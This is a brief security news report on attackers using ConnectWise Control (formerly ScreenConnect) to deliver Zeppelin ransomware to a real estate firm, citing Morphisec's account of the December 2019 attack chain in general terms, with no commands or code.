Remote attackers have abused ConnectWise Control software to deliver ransomware to its victims. The latest attacks against a real estate company used ransomware dubbed “Zeppelin”, a variant of the VegaLocker ransomware family.
According to security firm Morphisec, the more recent ransomware was delivered via ConnectWise Control software (formerly ScreenConnect). IT admins use the software to remotely control and execute commands on systems from a centralized web console.
Morphisec also said the firm prevented the Zeppelin attack after detecting activity on one of their customers in the real estate industry.
“The expansion of this particular variant into real estate makes it clear that attackers are expanding their use of the ransomware beyond their initial forays into infiltrating healthcare and IT companies,” Alon Groisman of Morphisec said in a recent blog post.
Groisman further described the delivery method and attack chain that occurred on December 2, 2019. For instance, the attack methods use ScreenConnect CMD shell and a PowerShell commands used to download commands from a command and control (C2) server. The commands are then used to ultimately deliver the Zeppelin malware.